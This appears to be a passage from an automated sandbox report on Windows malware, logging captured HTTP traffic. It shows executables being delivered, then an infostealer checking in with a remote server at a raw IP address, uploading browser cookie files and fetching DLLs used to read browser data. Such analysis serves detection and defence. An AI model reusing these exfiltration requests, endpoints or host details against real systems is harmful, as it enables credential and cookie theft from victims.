00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 07 Dec 2024 12:00:47 GMTContent-Type: application/octet-streamContent-Length: 1868288Last-Modified: Sat, 07 Dec 2024 11:47:01 GMTConnection: keep-aliveETag: "675435b5-1c8200"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 af 50 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 c6 03 00 00 ac 00 00 00 00 00 00 00 70 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 4a 00 00 04 00 00 4c ab 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 30 05 00 70 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 32 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 05 00 00 04 00 00 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 46 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 00 2b 00 00 40 05 00 00 02 00 00 00 48 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 71 62 6c 6a 78 66 70 00 20 1a 00 00 40 30 00 00 12 1a 00 00 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 62 79 71 66 6f 66 66 00 10 00 00 00 60 4a 00 00 04 00 00 00 5c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 4a 00 00 22 00 00 00 60 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 07 Dec 2024 12:00:55 GMTContent-Type: application/octet-streamContent-Length: 5277184Last-Modified: Sat, 07 Dec 2024 11:47:10 GMTConnection: keep-aliveETag: "675435be-508600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce b4 e2 38 8a d5 8c 6b 8a d5 8c 6b 8a d5 8c 6b e5 a3 27 6b 92 d5 8c 6b e5 a3 12 6b 87 d5 8c 6b e5 a3 26 6b b0 d5 8c 6b 83 ad 0f 6b 89 d5 8c 6b 83 ad 1f 6b 88 d5 8c 6b 0a ac 8d 6a 89 d5 8c 6b 8a d5 8d 6b d6 d5 8c 6b e5 a3 23 6b 98 d5 8c 6b e5 a3 11 6b 8b d5 8c 6b 52 69 63 68 8a d5 8c 6b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 3c e7 4a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 98 02 00 00 22 01 00 00 00 00 00 00 90 50 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 50 00 00 04 00 00 1a 09 51 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 90 24 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 a0 24 00 00 02 00 00 00 a0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 a2 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 61 6d 66 63 63 76 6f 6f 00 c0 2b 00 00 c0 24 00 00 bc 2b 00 00 a4 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 64 7a 6c 72 6c 78 70 00 10 00 00 00 80 50 00 00 04 00 00 00 60 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 90 50 00 00 22 00 00 00 64 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 07 Dec 2024 12:01:09 GMTContent-Type: application/octet-streamContent-Length: 973312Last-Modified: Sat, 07 Dec 2024 11:45:13 GMTConnection: keep-aliveETag: "67543549-eda00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 41 35 54 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 2a 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 d5 75 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 4c 6f 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 4c 6f 01 00 00 40 0d 00 00 70 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 64 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJJJDAEGIDHCBFHJJJEGHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 46 30 36 35 42 36 39 35 33 33 32 33 36 35 33 31 34 33 38 39 38 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 72 75 6d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4a 44 41 45 47 49 44 48 43 42 46 48 4a 4a 4a 45 47 2d 2d 0d 0a Data Ascii: ------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="hwid"AF065B6953323653143898------HJJJDAEGIDHCBFHJJJEGContent-Disposition: form-data; name="build"drum------HJJJDAEGIDHCBFHJJJEG--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHDBFIEGIDGIECBKJECHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 44 42 46 49 45 47 49 44 47 49 45 43 42 4b 4a 45 43 2d 2d 0d 0a Data Ascii: ------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------CFHDBFIEGIDGIECBKJECContent-Disposition: form-data; name="message"browsers------CFHDBFIEGIDGIECBKJEC--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAKJDHIEBFIIDGDGDBAEHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 4a 44 48 49 45 42 46 49 49 44 47 44 47 44 42 41 45 2d 2d 0d 0a Data Ascii: ------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------DAKJDHIEBFIIDGDGDBAEContent-Disposition: form-data; name="message"plugins------DAKJDHIEBFIIDGDGDBAE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDHIDBFBFHIJKFHCGIEHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 48 49 44 42 46 42 46 48 49 4a 4b 46 48 43 47 49 45 2d 2d 0d 0a Data Ascii: ------JJDHIDBFBFHIJKFHCGIEContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------JJDHIDBFBFHIJKFHCGIEContent-Disposition: form-data; name="message"fplugins------JJDHIDBFBFHIJKFHCGIE--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFBGCFCFHCFHIECAEHDHHost: 185.215.113.206Content-Length: 7243Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJDBGDGCGDAKFIDGIDBFHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 46 2d 2d 0d 0a Data Ascii: ------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------IJDBGDGCGDAKFIDGIDBFContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------IJDBGDGCGDAKFIDGIDBF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAFIJJECFHJJKFCAKJHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 46 49 4a 4a 45 43 46 48 4a 4a 4b 46 43 41 4b 4a 2d 2d 0d 0a Data Ascii: ------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EHDAFIJJECFHJJKFCAKJContent-Disposition: form-data; name="file"------EHDAFIJJECFHJJKFCAKJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBKEHJJDAAAAKECBGHDHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 4b 45 48 4a 4a 44 41 41 41 41 4b 45 43 42 47 48 44 2d 2d 0d 0a Data Ascii: ------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="token"0cc5dd56d157fc0d471da9f9365c8833f063ca53d79d3b404e416815d450862636a9c8fb------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JEBKEHJJDAAAAKECBGHDContent-Disposition: form-data; name="file"------JEBKEHJJDAAAAKECBGHD--
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECGHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBGHCGCAEBFIJKFIDBGHHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 63 35 64 64 35 36 64 31 35 37 66 63 30 64 34 37 31 64 61 39 66 39 33 36 35 63 38 38 33 33 66 30 36 33 63 61 35 33 64 37 39 64 33 62 34 30 34 65 34 31 36 38 31 35 64 34 35 30 38 36 32 36 33 36 61 39 63 38 66 62 0d 0a 2d 2d 2d 2d 2d 2d 46 42 47 48 43 47 43 41 45 42 46 49 4a 4b 46 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 